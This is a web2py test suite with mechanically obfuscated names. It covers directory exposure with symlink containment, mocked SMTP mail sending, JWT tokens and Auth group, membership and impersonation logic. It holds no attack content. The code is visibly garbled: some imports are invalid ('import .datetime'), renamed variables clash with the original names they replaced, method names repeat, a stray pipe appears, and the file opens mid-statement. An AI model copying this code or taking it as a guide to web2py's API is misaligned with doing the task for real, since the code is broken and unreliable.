('/bar', '/foo'),
('/foo/bar', '/bar'),
('/', '/x'),
]
for sub, VAR_5 in VAR_84:
self.assertFalse(Expose._Expose__in_base(subdir=sub, basedir=VAR_5, sep='/'),
'%s should not be under %s' % (sub, VAR_5))
class CLASS_5(unittest.TestCase):
def FUNC_1(self):
self.base_dir = tempfile.mkdtemp()
self.make_dirs()
self.touch_files()
self.make_readme()
if FUNC_0():
self.make_symlinks()
self.set_expectations()
tools.URL = lambda VAR_3: URL(VAR_8='a', c='c', f='f', VAR_3=args)
def FUNC_2(self):
tools.URL = URL
shutil.rmtree(self.base_dir)
def FUNC_45(self):
for VAR_78 in (['inside'],
['inside', 'dir1'],
['inside', 'dir2'],
['outside']):
os.mkdir(VAR_2(self.base_dir, *VAR_78))
def FUNC_46(self):
for f in (['inside', 'dir1', 'file1'],
['inside', 'dir1', 'file2'],
['outside', 'file3']):
with open(VAR_2(self.base_dir, *f), 'a'):
pass
def FUNC_47(self):
with open(VAR_2(self.base_dir, 'inside', 'README'), 'w') as f:
f.write('README content')
def FUNC_48(self):
os.symlink(
VAR_2(self.base_dir, 'inside', 'dir1'),
VAR_2(self.base_dir, 'inside', 'dir2', 'link_to_dir1'))
os.symlink(
VAR_2(self.base_dir, 'inside', 'dir1', 'file1'),
VAR_2(self.base_dir, 'inside', 'dir2', 'link_to_file1'))
os.symlink(
VAR_2(self.base_dir, 'outside'),
VAR_2(self.base_dir, 'inside', 'link_to_outside'))
os.symlink(
VAR_2(self.base_dir, 'outside', 'file3'),
VAR_2(self.base_dir, 'inside', 'link_to_file3'))
def FUNC_49(self):
VAR_85 = lambda VAR_3: URL('a', 'c', 'f', VAR_3=args)
self.expected_folders = {}
self.expected_folders['inside'] = SPAN(H3('Folders'), TABLE(
TR(TD(A('dir1', _href=VAR_85(VAR_3=['dir1'])))),
TR(TD(A('dir2', _href=VAR_85(VAR_3=['dir2'])))),
_class='table',
))
self.expected_folders[VAR_2('inside', 'dir1')] = ''
if FUNC_0():
self.expected_folders[VAR_2('inside', 'dir2')] = SPAN(H3('Folders'), TABLE(
TR(TD(A('link_to_dir1', _href=VAR_85(VAR_3=['dir2', 'link_to_dir1'])))),
_class='table',
))
else:
self.expected_folders[VAR_2('inside', 'dir2')] = ''
self.expected_files = {}
self.expected_files['inside'] = SPAN(H3('Files'), TABLE(
TR(TD(A('README', _href=VAR_85(VAR_3=['README']))), TD('')),
_class='table',
))
self.expected_files[VAR_2('inside', 'dir1')] = SPAN(H3('Files'), TABLE(
TR(TD(A('file1', _href=VAR_85(VAR_3=['dir1', 'file1']))), TD('')),
TR(TD(A('file2', _href=VAR_85(VAR_3=['dir1', 'file2']))), TD('')),
_class='table',
))
if FUNC_0():
self.expected_files[VAR_2('inside', 'dir2')] = SPAN(H3('Files'), TABLE(
TR(TD(A('link_to_file1', _href=VAR_85(VAR_3=['dir2', 'link_to_file1']))), TD('')),
_class='table',
))
else:
self.expected_files[VAR_2('inside', 'dir2')] = ''
def FUNC_50(self, VAR_5, VAR_6='', VAR_7=False):
current.request = Request(env={})
current.request.raw_args = VAR_6
current.request.args = VAR_6.split('/')
return Expose(VAR_5=VAR_2(self.base_dir, VAR_5),
basename=VAR_5,
VAR_7=follow_symlink_out)
def FUNC_51(self):
VAR_86 = self.make_expose(VAR_5='inside', VAR_6='')
self.assertEqual(VAR_86.args, [])
self.assertEqual(VAR_86.folders, ['dir1', 'dir2'])
self.assertEqual(VAR_86.filenames, ['README'])
@unittest.skipUnless(FUNC_0(), 'requires symlinks')
def FUNC_52(self):
VAR_86 = self.make_expose(VAR_5='inside', VAR_6='',
VAR_7=True)
self.assertEqual(VAR_86.args, [])
self.assertEqual(VAR_86.folders, ['dir1', 'dir2', 'link_to_outside'])
self.assertEqual(VAR_86.filenames, ['README', 'link_to_file3'])
def FUNC_53(self):
VAR_86 = self.make_expose(VAR_5='inside', VAR_6='dir1')
self.assertEqual(VAR_86.args, ['dir1'])
self.assertEqual(VAR_86.folders, [])
self.assertEqual(VAR_86.filenames, ['file1', 'file2'])
def FUNC_54(self):
VAR_86 = self.make_expose(VAR_5='inside', VAR_6='dir2')
self.assertEqual(VAR_86.args, ['dir2'])
if FUNC_0():
self.assertEqual(VAR_86.folders, ['link_to_dir1'])
self.assertEqual(VAR_86.filenames, ['link_to_file1'])
else:
self.assertEqual(VAR_86.folders, [])
self.assertEqual(VAR_86.filenames, [])
def FUNC_55(self):
VAR_86 = self.make_expose(VAR_5='', VAR_6='inside')
self.assertEqual(VAR_86.args, ['inside'])
if FUNC_0():
self.assertEqual(VAR_86.folders, ['dir1', 'dir2', 'link_to_outside'])
self.assertEqual(VAR_86.filenames, ['README', 'link_to_file3'])
else:
self.assertEqual(VAR_86.folders, ['dir1', 'dir2'])
self.assertEqual(VAR_86.filenames, ['README'])
def FUNC_56(self):
VAR_86 = self.make_expose(VAR_5='', VAR_6='inside/dir2')
self.assertEqual(VAR_86.args, ['inside', 'dir2'])
if FUNC_0():
self.assertEqual(VAR_86.folders, ['link_to_dir1'])
self.assertEqual(VAR_86.filenames, ['link_to_file1'])
else:
self.assertEqual(VAR_86.folders, [])
self.assertEqual(VAR_86.filenames, [])
def FUNC_57(self, VAR_8, VAR_9):
self.assertEqual(VAR_8 if isinstance(VAR_8, str) else VAR_8.xml(),
VAR_9 if isinstance(VAR_9, str) else VAR_9.xml())
def FUNC_58(self, VAR_5, VAR_6):
VAR_86 = self.make_expose(VAR_5, VAR_6)
VAR_87 = VAR_2(VAR_5, VAR_6).rstrip(os.path.sep)
VAR_88 = Request(env={})
self.assertSameXML(VAR_86.table_files(), self.expected_files[VAR_87])
self.assertSameXML(VAR_86.table_folders(), self.expected_folders[VAR_87])
def FUNC_59(self):
self.run_test_xml_for(VAR_5='inside', VAR_6='')
def FUNC_60(self):
self.run_test_xml_for(VAR_5='inside', VAR_6='dir1')
def FUNC_61(self):
self.run_test_xml_for(VAR_5='inside', VAR_6='dir2')
def FUNC_62(self):
with self.assertRaises(HTTP):
self.make_expose(VAR_5='inside', VAR_6='dir1/file_not_found')
def FUNC_30(self):
with self.assertRaises(HTTP):
self.make_expose(VAR_5='inside', VAR_6='link_to_file3')
|
import os
import sys
import shutil
import tempfile
import smtplib
import .datetime
import unittest
VAR_0 = os.getenv('DB', 'sqlite:memory')
from gluon.dal import DAL, Field
from pydal.objects import .Table
from gluon import .tools
from gluon.tools import Auth, Mail, Recaptcha2, prettydate, Expose, prevent_open_redirect
from gluon._compat import PY2, to_bytes
from gluon.globals import Request, Response, Session
from gluon.storage import Storage
from gluon.languages import .TranslatorFactory
from gluon.http import HTTP
from gluon import SPAN, H3, TABLE, TR, TD, A, URL, current
VAR_1 = "imap" in VAR_0
class VAR_23(unittest.TestCase):
class CLASS_7(object):
def __init__(self, VAR_10, VAR_11, VAR_12):
self.sender = VAR_10
self.to = VAR_11
self.payload = VAR_12
self._parsed_payload = None
@property
def FUNC_64(self):
if self._parsed_payload is None:
import email
self._parsed_payload = email.message_from_string(self.payload)
return self._parsed_payload
class CLASS_8(object):
VAR_13 = []
VAR_14 = {}
def __init__(self, VAR_15, VAR_16, **VAR_4):
self.address = VAR_15
self.port = VAR_16
self.has_quit = False
self.tls = False
def FUNC_65(self, VAR_17, VAR_18):
if VAR_17 not in self.users or self.users[VAR_17] != VAR_18:
raise smtplib.SMTPAuthenticationError
self.username = VAR_17
self.password = VAR_18
def FUNC_66(self, VAR_10, VAR_11, VAR_12):
self.inbox.append(VAR_23.Message(VAR_10, VAR_11, VAR_12))
def FUNC_67(self):
self.has_quit = True
def FUNC_68(self, VAR_19=None):
pass
def FUNC_69(self):
self.tls = True
def FUNC_1(self):
self.original_SMTP = smtplib.SMTP
self.original_SMTP_SSL = smtplib.SMTP_SSL
smtplib.SMTP = VAR_23.DummySMTP
smtplib.SMTP_SSL = VAR_23.DummySMTP
def FUNC_2(self):
smtplib.SMTP = self.original_SMTP
smtplib.SMTP_SSL = self.original_SMTP_SSL
def FUNC_3(self):
VAR_20 = Mail()
VAR_20.settings.server = 'smtp.example.com:25'
VAR_20.settings.sender = 'you@example.com'
self.assertTrue(VAR_20.send(VAR_11=['somebody@example.com'],
subject='hello',
reply_to='us@example.com',
VAR_21='world'))
VAR_21 = VAR_23.DummySMTP.inbox.pop()
self.assertEqual(VAR_21.sender, VAR_20.settings.sender)
self.assertEqual(VAR_21.to, ['somebody@example.com'])
VAR_22 = "To: somebody@example.com\nReply-To: us@example.com\nSubject: hello\n"
self.assertTrue(VAR_22 in VAR_21.payload)
self.assertTrue(VAR_21.payload.endswith('world'))
def FUNC_4(self):
VAR_20 = Mail()
VAR_20.settings.server = 'smtp.example.com:25'
VAR_20.settings.sender = 'you@example.com'
VAR_20.settings.login = 'username:password'
self.assertFalse(VAR_20.send(VAR_11=['somebody@example.com'],
subject='hello',
reply_to='us@example.com',
VAR_21='world'))
def FUNC_5(self):
VAR_23.DummySMTP.users['username'] = 'password'
VAR_20 = Mail()
VAR_20.settings.server = 'smtp.example.com:25'
VAR_20.settings.sender = 'you@example.com'
VAR_20.settings.login = 'username:password'
self.assertTrue(VAR_20.send(VAR_11=['somebody@example.com'],
subject='hello',
reply_to='us@example.com',
VAR_21='world'))
del VAR_23.DummySMTP.users['username']
VAR_23.DummySMTP.inbox.pop()
def FUNC_6(self):
VAR_20 = Mail()
VAR_20.settings.server = 'smtp.example.com:25'
VAR_20.settings.sender = 'you@example.com'
self.assertTrue(VAR_20.send(VAR_11=['somebody@example.com'],
subject='hello',
reply_to='us@example.com',
VAR_21='<html><head></head><body></body></html>'))
VAR_21 = VAR_23.DummySMTP.inbox.pop()
self.assertTrue('Content-Type: text/html' in VAR_21.payload)
def FUNC_7(self):
VAR_20 = Mail()
VAR_20.settings.server = 'smtp.example.com:25'
VAR_20.settings.sender = 'you@example.com'
self.assertTrue(VAR_20.send(VAR_11=['somebody@example.com'],
VAR_21=('Text only', '<html><pre>HTML Only</pre></html>')))
VAR_21 = VAR_23.DummySMTP.inbox.pop()
self.assertTrue(VAR_21.parsed_payload.is_multipart())
self.assertTrue(VAR_21.parsed_payload.get_content_type() == 'multipart/alternative')
VAR_24 = VAR_21.parsed_payload.get_payload()
self.assertTrue('Text only' in VAR_24[0].as_string())
self.assertTrue('<html><pre>HTML Only</pre></html>' in VAR_24[1].as_string())
def FUNC_8(self):
VAR_20 = Mail()
VAR_20.settings.server = 'smtp.example.com:25'
VAR_20.settings.sender = 'you@example.com'
VAR_20.settings.ssl = True
self.assertTrue(VAR_20.send(VAR_11=['somebody@example.com'],
subject='hello',
reply_to='us@example.com',
VAR_21='world'))
VAR_23.DummySMTP.inbox.pop()
def FUNC_9(self):
VAR_20 = Mail()
VAR_20.settings.server = 'smtp.example.com:25'
VAR_20.settings.sender = 'you@example.com'
VAR_20.settings.tls = True
self.assertTrue(VAR_20.send(VAR_11=['somebody@example.com'],
subject='hello',
reply_to='us@example.com',
VAR_21='world'))
VAR_23.DummySMTP.inbox.pop()
def FUNC_10(self):
VAR_25 = os.path.abspath(__file__)
VAR_20 = Mail()
VAR_20.settings.server = 'smtp.example.com:25'
VAR_20.settings.sender = 'you@example.com'
self.assertTrue(VAR_20.send(VAR_11=['somebody@example.com'],
subject='hello',
VAR_21='world',
attachments=Mail.Attachment(VAR_25)))
VAR_21 = VAR_23.DummySMTP.inbox.pop()
VAR_26 = VAR_21.parsed_payload.get_payload(1).get_payload(decode=True)
with open(VAR_25, 'rb') as mf:
self.assertEqual(to_bytes(VAR_26), to_bytes(mf.read()))
VAR_27 = open(VAR_25)
self.assertRaises(Exception, lambda *VAR_3, **VAR_4: Mail.Attachment(*VAR_3, **VAR_4), VAR_27)
stream.close()
self.assertTrue(VAR_20.send(VAR_11=['somebody@example.com'],
subject='hello',
VAR_21='world',
attachments=Mail.Attachment(VAR_25, content_id='trololo', content_type='tra/lala')))
VAR_21 = VAR_23.DummySMTP.inbox.pop()
self.assertTrue('Content-Type: tra/lala' in VAR_21.payload)
self.assertTrue('Content-Id: <trololo>' in VAR_21.payload)
class CLASS_1(unittest.TestCase):
def FUNC_1(self):
from gluon.tools import AuthJWT
from gluon import current
self.request = Request(env={})
self.request.application = 'a'
self.request.controller = 'c'
self.request.function = 'f'
self.request.folder = 'applications/admin'
self.current = current
self.current.request = self.request
self.db = DAL(VAR_0, check_reserved=['all'])
self.auth = Auth(self.db)
self.auth.define_tables(VAR_17=True, signature=False)
self.user_data = dict(VAR_17='jwtuser', VAR_18='jwtuser123')
self.db.auth_user.insert(VAR_17=self.user_data['username'],
VAR_18=str(
self.db.auth_user.password.requires[0](
self.user_data['password'])[0]))
self.jwtauth = AuthJWT(self.auth, secret_key='secret', verify_expiration=True)
def FUNC_11(self):
import gluon.serializers
self.request.vars.update(self.user_data)
self.token = self.jwtauth.jwt_token_manager()
self.assertIsNotNone(self.token)
del self.request.vars['username']
del self.request.vars['password']
self.request.vars._token = gluon.serializers.json_parser.loads(self.token)['token']
self.token = self.jwtauth.jwt_token_manager()
self.assertIsNotNone(self.token)
def FUNC_12(self):
import gluon.serializers
self.request.vars.update(self.user_data)
self.token = self.jwtauth.jwt_token_manager()
self.assertIsNotNone(self.token)
del self.request.vars['username']
del self.request.vars['password']
self.token = self.jwtauth.jwt_token_manager()
self.request.vars._token = gluon.serializers.json_parser.loads(self.token)['token']
@self.jwtauth.allows_jwt()
def FUNC_70():
self.assertEqual(self.user_data['username'], self.auth.user.username)
FUNC_70()
@unittest.skipIf(VAR_1, "TODO: Imap raises 'Connection refused'")
class CLASS_2(unittest.TestCase):
def FUNC_13(self, *VAR_3, **VAR_4):
if PY2:
return getattr(self, 'assertRaisesRegexp')(*VAR_3, **VAR_4)
return getattr(self, 'assertRaisesRegex')(*VAR_3, **VAR_4)
def FUNC_1(self):
self.request = Request(env={})
self.request.application = 'a'
self.request.controller = 'c'
self.request.function = 'f'
self.request.folder = 'applications/admin'
self.response = Response()
self.session = Session()
VAR_28 = TranslatorFactory('', 'en')
self.session.connect(self.request, self.response)
from gluon.globals import current
self.current = current
self.current.request = self.request
self.current.response = self.response
self.current.session = self.session
self.current.T = VAR_28
self.db = DAL(VAR_0, check_reserved=['all'])
self.auth = Auth(self.db)
self.auth.define_tables(VAR_17=True, signature=False)
self.db.define_table('t0', Field('tt'), self.auth.signature)
self.auth.enable_record_versioning(self.db)
self.auth.settings.registration_requires_verification = False
self.auth.settings.registration_requires_approval = False
self.auth.register_bare(first_name='Bart',
last_name='Simpson',
VAR_17='bart',
email='bart@simpson.com',
VAR_18='bart_password')
def FUNC_14(self):
self.assertTrue('auth_user' in self.db)
self.assertTrue('auth_group' in self.db)
self.assertTrue('auth_membership' in self.db)
self.assertTrue('auth_permission' in self.db)
self.assertTrue('auth_event' in self.db)
VAR_29 = self.db(self.db.auth_user.username == 'bart').select().first()
self.assertEqual(VAR_29['username'], 'bart')
self.assertEqual(VAR_29['registration_key'], '')
VAR_30 = self.db(self.db.auth_user.username == 'bart').select().first().id
VAR_31 = self.db(self.db.auth_group.role == 'user_{0}'.format(VAR_30)).select().first().id
self.assertTrue(self.db((self.db.auth_membership.group_id == VAR_31) &
(self.db.auth_membership.user_id == VAR_30)).select().first())
def FUNC_15(self):
for f in ['login', 'retrieve_password', 'retrieve_username', 'register']:
VAR_92 = getattr(self.auth, f)().xml()
self.assertTrue(b'name="_formkey"' in VAR_92)
for f in ['logout', 'verify_email', 'reset_password', 'change_password', 'profile', 'groups']:
self.myassertRaisesRegex(HTTP, "303*", getattr(self.auth, f))
self.myassertRaisesRegex(HTTP, "401*", self.auth.impersonate)
try:
for t in ['t0_archive', 't0', 'auth_cas', 'auth_event',
'auth_membership', 'auth_permission', 'auth_group',
'auth_user']:
self.db[t].drop()
except SyntaxError as e:
pass
return
def FUNC_16(self):
self.current.request.vars._next = 'next_test'
self.assertEqual(self.auth.get_vars_next(), 'next_test')
def FUNC_17(self):
self.assertTrue('t0_archive' in self.db)
def FUNC_18(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
VAR_30 = self.db(self.db.auth_user.username == 'bart').select(self.db.auth_user.id).first().id
self.auth.log_event(description='some_log_event_description_%(var1)s',
vars={"var1": "var1"},
origin='log_event_test_1')
VAR_32 = self.db(self.db.auth_event.origin == 'log_event_test_1'
).select(*[self.db.auth_event[f]
for f in self.db.auth_event.fields if f not in ('id', 'time_stamp')]).first().as_dict()
self.assertEqual(set(VAR_32.items()), set({'origin': 'log_event_test_1',
'client_ip': None,
'user_id': VAR_30,
'description': 'some_log_event_description_var1'}.items()))
self.auth.logout_bare()
self.auth.log_event(description='some_log_event_description_%(var2)s',
vars={"var2": "var2"},
origin='log_event_test_2')
VAR_32 = self.db(self.db.auth_event.origin == 'log_event_test_2'
).select(*[self.db.auth_event[f]
for f in self.db.auth_event.fields if f not in ('id', 'time_stamp')]).first().as_dict()
self.assertEqual(set(VAR_32.items()), set({'origin': 'log_event_test_2',
'client_ip': None,
'user_id': None,
'description': 'some_log_event_description_var2'}.items()))
self.auth.settings.logging_enabled = False
VAR_33 = self.db(self.db.auth_event.id > 0).count()
self.auth.log_event(description='some_log_event_description_%(var3)s',
vars={"var3": "var3"},
origin='log_event_test_3')
VAR_34 = self.db(self.db.auth_event.id > 0).count()
self.assertEqual(VAR_34, VAR_33)
self.auth.settings.logging_enabled = True
VAR_33 = self.db(self.db.auth_event.id > 0).count()
self.auth.log_event(description=None,
vars={"var4": "var4"},
origin='log_event_test_4')
VAR_34 = self.db(self.db.auth_event.id > 0).count()
self.assertEqual(VAR_34, VAR_33)
def FUNC_19(self):
self.db.auth_user.insert(email='user1@test.com', VAR_17='user1', VAR_18='password_123')
self.db.commit()
self.assertEqual(self.auth.get_or_create_user({'email': 'user1@test.com',
'username': 'user1',
'password': 'password_123'
})['username'], 'user1')
self.assertEqual(self.auth.get_or_create_user({'email': 'user2@test.com',
'username': 'user2'})['username'], 'user2')
self.assertEqual(self.auth.get_or_create_user({'first_name': 'Omer',
'last_name': 'Simpson',
'email': 'user3@test.com',
'registration_id': 'user3',
'username': 'user3'})['username'], 'user3')
self.assertEqual(self.auth.get_or_create_user({'email': ''}), None)
self.db.auth_user.truncate()
self.db.commit()
def FUNC_20(self):
self.auth.login_bare(VAR_17='bart', VAR_18='bart_password')
self.assertTrue(self.auth.is_logged_in())
self.auth.logout_bare()
self.assertFalse(self.auth.login_bare(VAR_17='bart', VAR_18='wrong_password'))
def FUNC_21(self):
self.assertRaises(ValueError, self.auth.register_bare)
self.assertEqual(self.auth.register_bare(VAR_17='bart', VAR_18='wrong_password'), False)
self.assertEqual(self.auth.register_bare(VAR_17='user2',
email='user2@test.com',
VAR_18='password_123')['username'], 'user2')
self.assertRaises(ValueError, self.auth.register_bare,
**dict(wrong_field_name='user3', VAR_18='password_123'))
self.assertRaises(ValueError, self.auth.register_bare,
**dict(email='user4@', VAR_18='password_123'))
self.db.auth_user.truncate()
self.db.commit()
def FUNC_22(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
self.assertTrue(self.auth.is_logged_in())
self.auth.logout_bare()
self.assertFalse(self.auth.is_logged_in())
def FUNC_23(self):
self.auth.user = 'logged_in'
self.assertTrue(self.auth.is_logged_in())
self.auth.user = None
self.assertFalse(self.auth.is_logged_in())
def FUNC_24(self):
self.assertTrue(self.auth.random_password())
def FUNC_25(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
self.auth.settings.bulk_register_enabled = True
VAR_35 = self.auth.bulk_register(max_emails=10).xml()
self.assertTrue(b'name="_formkey"' in VAR_35)
def FUNC_26(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
VAR_36 = getattr(self.auth, 'change_password')().xml()
self.assertTrue(b'name="_formkey"' in VAR_36)
def FUNC_27(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
VAR_37 = getattr(self.auth, 'profile')().xml()
self.assertTrue(b'name="_formkey"' in VAR_37)
def FUNC_28(self):
self.auth.get_or_create_user(dict(first_name='Omer',
last_name='Simpson',
VAR_17='omer',
email='omer@test.com',
VAR_18='password_omer',
registration_key='',
registration_id=''),
FUNC_65=False)
self.db.commit()
self.assertFalse(self.auth.is_logged_in())
VAR_38 = self.auth.add_group('impersonate')
self.auth.add_membership(VAR_43=self.db(self.db.auth_user.username == 'bart'
).select(self.db.auth_user.id).first().id,
VAR_38=group_id)
self.auth.add_permission(VAR_38=group_id,
name='impersonate',
table_name='auth_user',
record_id=0)
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
self.assertTrue(self.auth.is_logged_in())
VAR_30 = self.db(self.db.auth_user.username == 'bart').select(self.db.auth_user.id).first().id
self.assertEqual(self.auth.user_id, VAR_30)
self.assertEqual(self.auth.impersonate().xml(),
b'<form action="#" enctype="multipart/form-data" method="post"><table><tr id="no_table_user_id__row"><td class="w2p_fl"><label class="" for="no_table_user_id" id="no_table_user_id__label">User Id: </label></td><td class="w2p_fw"><input class="integer" id="no_table_user_id" name="user_id" type="text" value="" /></td><td class="w2p_fc"></td></tr><tr id="submit_record__row"><td class="w2p_fl"></td><td class="w2p_fw"><input type="submit" value="Submit" /></td><td class="w2p_fc"></td></tr></table></form>')
self.assertEqual(self.auth.impersonate(VAR_30), None)
self.assertFalse(self.auth.is_impersonating()) # User shouldn't impersonate itself?
VAR_39 = self.db(self.db.auth_user.username == 'omer').select(self.db.auth_user.id).first().id
VAR_40 = self.auth.impersonate(VAR_43=VAR_39)
self.assertTrue(self.auth.is_impersonating())
self.assertEqual(self.auth.user_id, VAR_39) # we make it really sure
self.assertEqual(VAR_40.xml(),
b'<form action="#" enctype="multipart/form-data" method="post"><table><tr id="auth_user_id__row"><td class="w2p_fl"><label class="readonly" for="auth_user_id" id="auth_user_id__label">Id: </label></td><td class="w2p_fw"><span id="auth_user_id">2</span></td><td class="w2p_fc"></td></tr><tr id="auth_user_first_name__row"><td class="w2p_fl"><label class="readonly" for="auth_user_first_name" id="auth_user_first_name__label">First name: </label></td><td class="w2p_fw">Omer</td><td class="w2p_fc"></td></tr><tr id="auth_user_last_name__row"><td class="w2p_fl"><label class="readonly" for="auth_user_last_name" id="auth_user_last_name__label">Last name: </label></td><td class="w2p_fw">Simpson</td><td class="w2p_fc"></td></tr><tr id="auth_user_email__row"><td class="w2p_fl"><label class="readonly" for="auth_user_email" id="auth_user_email__label">E-VAR_20: </label></td><td class="w2p_fw">omer@test.com</td><td class="w2p_fc"></td></tr><tr id="auth_user_username__row"><td class="w2p_fl"><label class="readonly" for="auth_user_username" id="auth_user_username__label">Username: </label></td><td class="w2p_fw">omer</td><td class="w2p_fc"></td></tr></table><div style="display:none;"><input name="id" type="hidden" value="2" /></div></form>')
self.auth.logout_bare()
self.auth.login_user(self.db(self.db.auth_user.username == 'omer').select().first()) # bypass login_bare()
self.myassertRaisesRegex(HTTP, "403*", self.auth.impersonate, VAR_30)
self.auth.logout_bare()
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
self.myassertRaisesRegex(HTTP, "401*", self.auth.impersonate, 1000) # VAR_42 with id 1000 shouldn't exist
self.auth.impersonate(VAR_43=VAR_39)
self.assertTrue(self.auth.is_impersonating())
self.assertEqual(self.auth.impersonate(VAR_43=0), None)
def FUNC_29(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
self.assertEqual(self.auth.groups().xml(),
b'<table><tr><td><h3>user_1(1)</h3></td></tr><tr><td><p></p></td></tr></table>')
def FUNC_30(self):
self.current.request.ajax = 'facke_ajax_request'
self.myassertRaisesRegex(HTTP, "403*", self.auth.not_authorized)
self.current.request.ajax = None
self.assertEqual(self.auth.not_authorized(), self.auth.messages.access_denied)
def FUNC_12(self):
self.myassertRaisesRegex(HTTP, "400*", self.auth.allows_jwt)
def FUNC_31(self):
self.assertEqual(self.auth.add_group(role='a_group', description='a_group_role_description'),
self.db(self.db.auth_group.role == 'a_group').select(self.db.auth_group.id).first().id)
def FUNC_32(self):
VAR_31 = 1 # Should be group 1, 'user_1'
self.assertEqual(self.auth.del_group(VAR_38=VAR_31), None)
def FUNC_33(self):
self.assertEqual(self.auth.id_group(role='user_1'), 1)
self.assertEqual(self.auth.id_group(role='non_existing_role_name'), None)
def FUNC_34(self):
self.assertEqual(self.auth.user_group(VAR_43=1), 1)
def FUNC_35(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
VAR_41 = 'user_%s' % self.db(self.db.auth_user.username == 'bart'
).select(self.db.auth_user.id).first().id
self.assertEqual(self.auth.user_group_role(), VAR_41)
self.auth.logout_bare()
self.assertEqual(self.auth.user_group_role(VAR_43=1), 'user_1')
self.auth.settings.create_user_groups = None
self.assertEqual(self.auth.user_group_role(VAR_43=1), None)
def FUNC_36(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
self.assertTrue(self.auth.has_membership('user_1'))
self.assertFalse(self.auth.has_membership('user_555'))
self.assertTrue(self.auth.has_membership(VAR_38=1))
self.auth.logout_bare()
self.assertTrue(self.auth.has_membership(role='user_1', VAR_43=1))
self.assertTrue(self.auth.has_membership(VAR_38=1, VAR_43=1))
VAR_33 = self.db(self.db.auth_event.id > 0).count()
self.assertTrue(self.auth.has_membership(VAR_38=1, VAR_43=1))
VAR_34 = self.db(self.db.auth_event.id > 0).count()
self.assertEqual(VAR_34, VAR_33)
def FUNC_37(self):
VAR_42 = self.db(self.db.auth_user.username == 'bart').select().first() # bypass login_bare()
VAR_43 = VAR_42.id
VAR_44 = 'test_add_membership_group'
VAR_38 = self.auth.add_group(VAR_44)
self.assertFalse(self.auth.has_membership(VAR_44))
self.auth.add_membership(VAR_38=group_id, VAR_43=user_id)
self.assertTrue(self.auth.has_membership(VAR_38, VAR_43=user_id))
self.auth.del_membership(VAR_38=group_id, VAR_43=user_id)
self.assertFalse(self.auth.has_membership(VAR_38, VAR_43=user_id))
self.auth.add_membership(role=VAR_44, VAR_43=user_id)
self.assertTrue(self.auth.has_membership(VAR_38, VAR_43=user_id))
self.auth.del_membership(VAR_38=group_id, VAR_43=user_id)
self.assertFalse(self.auth.has_membership(VAR_38, VAR_43=user_id))
with self.myassertRaisesRegex(ValueError, '^VAR_38 not provided or invalid$'):
self.auth.add_membership(VAR_38='not_existing_group_name', VAR_43=user_id)
with self.myassertRaisesRegex(ValueError, '^VAR_38 not provided or invalid$'):
self.auth.add_membership(role='not_existing_role_name', VAR_43=user_id)
with self.myassertRaisesRegex(ValueError, '^VAR_43 not provided or invalid$'):
self.auth.add_membership(VAR_38=group_id, VAR_43=None)
with self.myassertRaisesRegex(ValueError, '^VAR_43 not provided or invalid$'):
self.auth.add_membership(role=VAR_44, VAR_43=None)
self.auth.login_user(VAR_42)
self.auth.add_membership(VAR_38=group_id)
self.assertTrue(self.auth.has_membership(VAR_38))
self.auth.del_membership(VAR_38=group_id)
self.assertFalse(self.auth.has_membership(VAR_38))
self.auth.add_membership(role=VAR_44)
self.assertTrue(self.auth.has_membership(VAR_38))
self.auth.del_membership(VAR_38=group_id)
self.assertFalse(self.auth.has_membership(VAR_38))
self.auth.add_membership(VAR_44)
self.assertTrue(self.auth.has_membership(VAR_38))
self.auth.del_membership(VAR_38=group_id)
self.assertFalse(self.auth.has_membership(VAR_38))
VAR_45 = self.auth.add_membership(VAR_38)
self.assertTrue(self.auth.has_membership(VAR_38))
VAR_46 = self.auth.add_membership(VAR_38)
self.assertEqual(VAR_45, VAR_46)
self.auth.del_membership(VAR_38=group_id)
self.assertFalse(self.auth.has_membership(VAR_38))
with self.myassertRaisesRegex(ValueError, '^VAR_38 not provided or invalid$'):
self.auth.add_membership(VAR_38='not_existing_group_name')
with self.myassertRaisesRegex(ValueError, '^VAR_38 not provided or invalid$'):
self.auth.add_membership(role='not_existing_role_name')
def FUNC_38(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
VAR_33 = self.db(self.db.auth_event.id > 0).count()
VAR_47 = self.db(self.db.auth_membership.group_id == self.auth.id_group('user_1')
).select(self.db.auth_membership.id).first().id
self.assertEqual(self.auth.del_membership('user_1'), VAR_47)
VAR_34 = self.db(self.db.auth_event.id > 0).count()
self.assertEqual(VAR_34, VAR_33)
VAR_38 = self.auth.add_group('some_test_group')
VAR_48 = self.auth.add_membership('some_test_group')
self.assertEqual(self.auth.user_groups[VAR_38], 'some_test_group')
self.auth.logout_bare()
self.assertFalse(self.auth.del_membership('some_test_group'))
self.assertEqual(set(self.db.auth_membership(VAR_48).as_dict().items()),
set({'group_id': 2, 'user_id': 1, 'id': 2}.items())) # is not deleted
VAR_30 = self.db(self.db.auth_user.username == 'bart').select(self.db.auth_user.id).first().id
self.assertTrue(self.auth.del_membership('some_test_group', VAR_43=VAR_30))
self.assertEqual(self.db.auth_membership(VAR_48), None) # is really deleted
def FUNC_39(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
VAR_30 = self.db(self.db.auth_user.username == 'bart').select(self.db.auth_user.id).first().id
self.auth.add_permission(VAR_38=self.auth.id_group('user_1'),
name='some_permission',
table_name='auth_user',
record_id=0,
)
self.assertTrue(self.auth.has_permission(name='some_permission',
table_name='auth_user',
record_id=0,
VAR_43=VAR_30,
VAR_38=self.auth.id_group('user_1')))
self.assertFalse(self.auth.has_permission(name='some_other_permission',
table_name='auth_user',
record_id=0,
VAR_43=VAR_30,
VAR_38=self.auth.id_group('user_1')))
def FUNC_40(self):
VAR_33 = self.db(self.db.auth_event.id > 0).count()
